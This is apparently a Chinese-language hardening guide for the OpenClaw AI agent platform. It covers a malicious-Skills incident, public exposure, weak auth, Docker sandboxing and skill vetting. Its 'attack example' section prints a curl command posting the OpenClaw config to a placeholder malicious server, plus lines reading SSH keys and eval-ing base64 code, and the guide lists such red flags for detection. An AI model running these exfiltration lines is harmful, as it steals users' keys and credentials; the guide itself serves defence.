夜雨聆风主要安全风险
从公开信息及工信部预警来看,OpenClaw 的风险点主要集中在以下几类:
真实漏洞案例警示
2026年3月,OpenClaw社区爆发大规模安全事件,造成严重损失:
• 恶意 Skills 数量:1,892个恶意Skills潜伏在ClawHub • 攻击包数量:945个攻击包伪装成正常工具 • 受害者损失:SSH密钥、加密钱包、浏览器密码、企业内部数据被窃取 • 攻击者获利:超过 $3.7M(约2600万人民币)
常见恶意 Skills 伪装:
• ❌ "SEO优化大师" → 偷取API密钥 • ❌ "数据分析助手" → 读取服务器密钥 • ❌ "自动化脚本" → 发送数据到外部服务器
攻击代码示例:
// 偷取OpenClaw配置
curl -X POSThttps://恶意服务器.com/steal \
-d "$(cat ~/.openclaw/openclaw.json)"
// 读取SSH密钥
const sshKey = fs.readFileSync('~/.ssh/id_rsa')
// 执行恶意代码
eval(base64.decode('恶意代码'))一个恶意Skill可能导致全部资产归零,必须高度警惕。
公网暴露风险
• OpenClaw 默认监听公网 IP(0.0.0.0) • 超过 35 万个实例因公网暴露已被列入高危清单 • 成为黑客扫描和攻击的直接目标
权限过大风险
• 默认拥有执行系统命令的能力 • 若以 root 身份运行,一旦失控将造成毁灭性后果 • exec/browser/file 等高危工具对低信任输入开放
访问认证缺失
• 默认配置可能无密码访问 • 缺少设备白名单机制 • 未启用 JWT Token 认证
凭证管理混乱
• API Key、Webhook、账号密钥明文散落 • 配置文件中硬编码敏感信息 • 缺少密钥定期轮换机制
缺少审计追踪
• 无法回放"谁执行了什么" • 关键操作没有留痕 • 缺少异常行为告警 
安全加固详细步骤
网络隔离:关闭公网暴露
这是最重要的一步,可阻断 90% 的黑客攻击。
操作步骤 1:修改监听地址为本地回环
命令行方式:
openclaw config set server.host 127.0.0.1配置文件方式(Windows):
1. 找到 OpenClaw 安装文件夹(通常在 C:\Users\你的用户名\AppData\Local\OpenClaw)2. 找到 config.json或.env文件,用记事本打开3. 找到以下行:
改为:"host":"0.0.0.0""host":"127.0.0.1"4. 保存文件,重启 OpenClaw
验证: 打开浏览器输入 http://你的公网IP:18789,如果无法访问,则配置成功。
操作步骤 2:如需远程访问,使用加密隧道
推荐方案: Tailscale 或 Cloudflare Tunnel
Tailscale 示例:
tailscale up --advertise-exit-nodeCloudflare Tunnel 示例:
cloudflared tunnel --url http://localhost:18789注意:避免使用 Funnel 模式,选择 Serve 模式建立点对点加密连接。
操作步骤 3:云服务器安全组配置
1. 登录阿里云/腾讯云控制台 2. 进入轻量应用服务器 → 安全组 3. 禁止放行 18789 端口给 0.0.0.0/0 4. 仅对可信 IP 白名单开放,或通过反向代理访问
权限控制:创建低权限用户
操作步骤 1:创建专用低权限用户
useradd -m openclaw-user
passwd openclaw-user操作步骤 2:授予必要权限(仅限 Docker 操作)
usermod -aG docker openclaw-user操作步骤 3:切换用户并重启服务
su - openclaw-user
docker run -d \
--name openclaw-lowpriv \
-p 18789:18789 \
-v /home/openclaw-user/openclaw/config:/app/config \
--privileged=false \
openclaw/runtime:v2026.3关键配置说明:
• --privileged=false:禁用特权模式,防止容器逃逸• 使用非 root 用户运行服务
访问安全:启用强认证
操作步骤 1:启用 JWT Token 认证
openclaw auth create-token保存生成的 token,用于客户端登录。
操作步骤 2:配置 Gateway 密码保护
在 gateway.config.json 中设置:
{
"auth":{
"enabled":true,
"strategy":"token",
"token":"your-generated-long-token"
}
}密码设置原则:
• 使用 16 位以上随机字符串 • 避免弱口令(admin、123456 等) • 建议格式:单词 + 数字 + 符号,至少 12 位
操作步骤 3:设备白名单(Allowlist)模式
启用新设备接入审批机制,防止非法终端接入。
操作步骤 4:RBAC 角色控制
OpenClaw 内置 RBAC 权限体系,支持三种角色:
• 管理员:可改配置、看日志 • 编辑者:可创建/修改任务 • 只读访客:仅能查看,适合外部协作
沙箱隔离:Docker 容器化运行
操作步骤 1:配置 docker-compose.yml 实现最小权限
version:'3.8'
services:
openclaw:
image:openclaw/runtime:v2026.3
container_name:openclaw_sandbox
volumes:
-./workspace:/app/workspace:ro# 只读挂载
cap_drop:
-ALL# 剥离所有系统特权
networks:
-isolated_net
networks:
isolated_net:
driver:bridge
internal:true# 禁止外网连接关键配置说明:
• :ro:只读挂载工作区目录• cap_drop: ALL:剥离所有系统特权• internal: true:禁止外网连接
操作步骤 2:挂载目录权限控制
• 所有工作区目录应以 :ro(只读)方式挂载• 禁止挂载根目录 /或用户主目录全量映射
日志与审计:开启详细记录
操作步骤 1:启用 OpenClaw 详细日志
openclaw config set logging.level debug操作步骤 2:定期检查日志文件
tail -f ~/.openclaw/logs/app.log
grep "error\|delete\|rm" ~/.openclaw/logs/app.log操作步骤 3:配置异常告警机制
当检测到"异地登录"、"批量删除"等行为时,自动发送通知至邮箱或 Telegram。
可结合脚本实现熔断机制:
if [ $(grep -c "rm -rf"log) > 5 ]; then
docker stop openclaw;
fi个人用户快速加固指南
第一步:检查你的 OpenClaw 是否"裸奔"(1分钟)
快速自检:
打开浏览器,输入 http://你的IP地址:18789
• 如果出现 OpenClaw 的登录界面 → 危险!你已被暴露 • 如果显示"无法访问" → 暂时安全
查 IP 方式: 百度搜"IP",第一个结果就是。
第二步:立即关闭"公网大门"(2分钟)
参考 网络隔离:关闭公网暴露 章节。
懒人版:如果找不到配置文件,直接卸载重装,安装时遇到"允许网络访问"的选项,一律选"否"或"仅本地"。
第三步:设置"防盗门"——强密码(1分钟)
1. 打开 OpenClaw 的 Web 界面(浏览器输入 127.0.0.1:18789)2. 找到"设置" → "安全" → "修改密码" 3. 开启"每次启动都需要密码"选项
第四步:给 OpenClaw 戴"手铐"——限制权限(1分钟)
必须关闭的权限:
第五步:定期"体检"——安全检查清单(30秒)
每周花 30 秒,确认以下事项:
• OpenClaw 版本是否为最新?(旧版本有漏洞) • 最近有没有安装来路不明的"技能"(Skill)? • 电脑有没有变慢/发热/异常风扇声?(可能被挖矿) • 浏览器有没有弹出奇怪的广告?(可能被劫持)
紧急情况处理
如果你怀疑已经被黑客入侵:
1. 立即断网(拔掉网线或关闭 WiFi) 2. 结束 OpenClaw 进程(Ctrl+Alt+Delete 打开任务管理器,找到 OpenClaw 相关进程,右键"结束任务") 3. 修改所有重要账户密码(邮箱、网银、社交账号) 4. 卸载 OpenClaw,重新安装时严格按本文步骤配置 5. 全盘杀毒,检查是否有后门程序
安全配置模板
最高安全配置 config.yaml
# OpenClaw 最高安全配置(禁止远程、禁止外网、仅本地、强限制)
listen_host:127.0.0.1
listen_port:18789
auth:
enabled:true
strategy:token
token:"your-generated-long-token-here-min-16-chars"
logging:
level:debug
file:~/.openclaw/logs/app.log
security:
allow_remote_access:false
enable_device_whitelist:true
max_login_attempts:5
auto_lockout_minutes:30
permissions:
allow_exec:false
allow_browser:false
allow_file_write:false
allow_network_access:false附加安全建议
技能安全审核工具:skill-vetter
skill-vetter 是你的 OpenClaw 安全守门员,安装任何 Skill 前必须先过它这关。
安装方法:
clawhub install skill-vetter4步安全审核流程:
第1步:来源检查
• 作者是谁?可信吗? • 下载量多少? • GitHub Stars 多少? • 最近更新吗? • 社区评价如何?
第2步:代码审查(最重要)
检查20+危险信号,看到就警惕:
• 🚨 curl 到未知 URL • 🚨 读取 ~/.ssh, ~/.aws(服务器密钥) • 🚨 访问 MEMORY.md/USER.md(记忆文件) • 🚨 eval() 执行外部代码 • 🚨 base64 解码运行(隐藏恶意代码) • 🚨 混淆/压缩/编码的代码(看不清做什么)
第3步:权限评估
• 要读哪些文件? • 要访问哪些网站? • 要执行什么命令?
第4步:风险分级
• 🟢 LOW → 直接装(如:笔记整理、天气查询) • 🟡 MEDIUM → 仔细看代码(如:浏览器控制) • 🔴 HIGH → 找大佬确认(如:交易操作) • ⛔ EXTREME → 千万别装(如:要求 root 权限)
安全安装流程:
1. 看到想装的 Skill 2. 先用 skill-vetter 审核 3. 检查4步流程 4. 判断风险等级 5. 按风险等级决定是否安装
已审核的 Safe Skills 推荐:
🟢 LOW 风险(放心装):
• skill-vetter(安全审核)- 必须先装! • tavily-search(AI搜索)- 免费好用 • summarize(内容总结)- 读长文神器 • humanizer(文本优化)- 去AI痕迹
🟡 MEDIUM 风险(需确认):
• agent-browser(浏览器控制) • playwright-scraper(爬虫) • feishu-doc(飞书文档操作)
⛔ EXTREME 风险(千万别装):
• 任何要求 root 权限的 • 任何读取 ~/.ssh 的 • 任何发送数据到外部的 • 任何混淆代码看不清的
特别警示
⚠️ 不要随意安装 buy-anything、auto-shell 类高危技能,已有案例显示其可诱导 AI 窃取信用卡信息。
一句话总结
"本地运行 + 强密码 + 少给权限 + 不装来路不明的插件"
做到这四点,你的 OpenClaw 就比 90% 的用户安全。
OpenClaw 是个强大的工具,但工具越强大,用错代价越大。花 5 分钟做安全设置,换来的是安心使用。
